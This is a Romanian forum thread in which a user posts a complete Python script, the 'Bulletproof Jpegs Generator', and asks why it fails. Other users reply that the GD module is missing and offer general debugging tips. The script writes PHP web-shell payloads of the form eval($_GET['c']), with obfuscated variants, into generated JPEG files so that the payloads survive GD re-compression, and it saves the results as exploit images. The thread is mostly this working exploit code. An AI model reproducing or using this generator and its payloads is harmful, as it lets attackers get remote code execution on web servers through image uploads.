zeroabsolut Posted December 1, 2015 Report Share Posted December 1, 2015 (edited) #!/usr/bin/python""" Bulletproof Jpegs Generator Copyright (C) 2012 Damien "virtualabs" Cauquil This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA."""import struct,sys,osimport gdfrom StringIO import StringIOfrom random import randint,shufflefrom time import time# image width/height (square)N = 32def insertPayload(_in, _out, payload,off): """ Payload insertion (quick JPEG parsing and patching) """ img = _in # look for 'FF DA' (SOS) sos = img.index("\xFF\xDA") sos_size = struct.unpack('>H',img[sos+2:sos+4])[0] sod = sos_size+2 # look for 'FF D9' (EOI) eoi = img[sod:].index("\xFF\xD9") # enough size ? if (eoi - sod - off)>=len(payload): _out.write(img[:sod+sos+off]+payload+img[sod+sos+len(payload)+off:]) return True else: return Falseif __name__=='__main__': print "[+] Virtualabs' Nasty bulletproof Jpeg generator" print " | website: http://virtualabs.fr" print " | contact: virtualabs -at- gmail -dot- com" print "" payloads = ["<?php eval(/**/$_GET['c'/**/]);?>","<?php /**/eval($_GET[chr(99)/**/]);?>","<?php eval(/**/$_GET[chr(99)]);?>","<?php\r\neval($_GET[/**/'c']);\r\n ?>", "<?php eval(/**/$_GET['c']);?>", "<?php eval($_GET['c'])/**/;?>", "<?/**/ eval($_GET['c']);?>"] # make sure the exploit-jpg directory exists or create it if os.path.exists('exploit-jpg') and not os.path.isdir('exploit-jpg'): print "[!] Please remove the file named 'exploit-jpg' from the current directory" elif not os.path.exists('exploit-jpg'): os.mkdir('exploit-jpg') # start generation print '[i] Generating ...' for q in range(50,100)+[-1]: # loop over every payload for p in payloads: # not done yet done = False start = time() # loop while not done and timeout not reached while not done and (time()-start)<10.0: # we create a NxN pixels image, true colors img = gd.image((N,N),True) # we create a palette pal = [] for i in range(N*N): pal.append(img.colorAllocate((randint(0,256),randint(0,256),randint(0,256)))) # we shuffle this palette shuffle(pal) # and fill the image with it pidx = 0 for x in range(N): for y in range(N): img.setPixel((x,y),pal[pidx]) pidx+=1 # write down the image out_jpg = StringIO('') img.writeJpeg(out_jpg,q) out_raw = out_jpg.getvalue() # now, we try to insert the payload various ways for i in range(64): test_jpg = StringIO('') if insertPayload(out_raw,test_jpg,p,i): try: # write down the new jpeg file f = open('exploit-jpg/exploit-%d.jpg'%q,'wb') f.write(test_jpg.getvalue()) f.close() # load it with GD test = gd.image('exploit-jpg/exploit-%d.jpg'%q) final_jpg = StringIO('') test.writeJpeg(final_jpg,q) final_raw = final_jpg.getvalue() # does it contain our payload ? if p in final_raw: # Yay ! print '[i] Jpeg quality %d ... DONE'%q done = True break except IOError,e: pass else: break if not done: # payload not found, we remove the file os.unlink('exploit-jpg/exploit-%d.jpg'%q) else: breakAveti idee de ce nu merge? @theeternalwanderer cam asta imi arate folosesc python 2.7 Edited December 1, 2015 by zeroabsolut Quote Link to comment Share on other sites More sharing options...
theeternalwanderer Posted December 1, 2015 Report Share Posted December 1, 2015 (edited) Ce nu merge?Da-ne un exemplu/screenshot in care tu il executi si arata ce eroare iti da. (nu toata lumea are timp de code review) @zeroabsolut iti zice clar care e problema. hurr durr: python - installing GD and gd module - Ask Ubuntu Edited December 1, 2015 by theeternalwanderer Quote Link to comment Share on other sites More sharing options...
zeroabsolut Posted December 1, 2015 Author Report Share Posted December 1, 2015 Ce nu merge?Da-ne un exemplu/screenshot in care tu il executi si arata ce eroare iti da. (nu toata lumea are timp de code review) @theeternalwanderer Quote Link to comment Share on other sites More sharing options...
theeternalwanderer Posted December 1, 2015 Report Share Posted December 1, 2015 Daca esti la inceput, asigura-te ca ai citit mesajul de eroare. De obicei ai suficiente informatii acolo cat sa poti sa-i dai de capat - gen linia pe care s-a facut eroarea si detalii despre eroare. Apoi daca nu reusesti sa-i dai de capat da-i pe Google. Quote Link to comment Share on other sites More sharing options...